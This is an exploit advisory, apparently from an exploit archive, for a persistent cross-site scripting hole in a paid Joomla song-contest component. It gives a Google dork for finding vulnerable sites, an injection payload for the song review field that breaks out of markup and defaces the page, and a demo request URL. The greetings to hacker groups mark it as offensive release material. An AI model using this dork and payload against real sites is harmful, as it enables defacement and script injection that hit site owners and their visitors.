29 lines
No EOL
1.3 KiB
Text
29 lines
No EOL
1.3 KiB
Text
Critical Level : HIGH
|
|
Vendor Url : http://joomlaextensions.co.in/component/awd_song/
|
|
Google Dork: inurl:com_awd_song
|
|
Price:$37.00
|
|
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
|
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
|
|
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
|
|
#######################################################################################################
|
|
Description:
|
|
Frontend
|
|
There are 4 menus.
|
|
|
|
1. (Enter Contest) User can upload a new song.Whenever new songs are uploaded, users will receive an email to rate the new contest songs.
|
|
2. (Winner song) Users can see all of the winning songs from today.
|
|
3. (My Songs) Users can see all of their own songs they have uploaded.
|
|
4. (My Rated Songs) Users can see all of their own ratings for other users songs.
|
|
|
|
|
|
#######################################################################################################
|
|
Xploit:persistent xss Vulnerability
|
|
|
|
The attacker can post evil script or xss shell in the song review option
|
|
|
|
For example :">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
|
|
|
|
|
|
DEMO URL : http://server/index.php?option=com_awd_song&task=view&id=4
|
|
|
|
############################################################################################################### |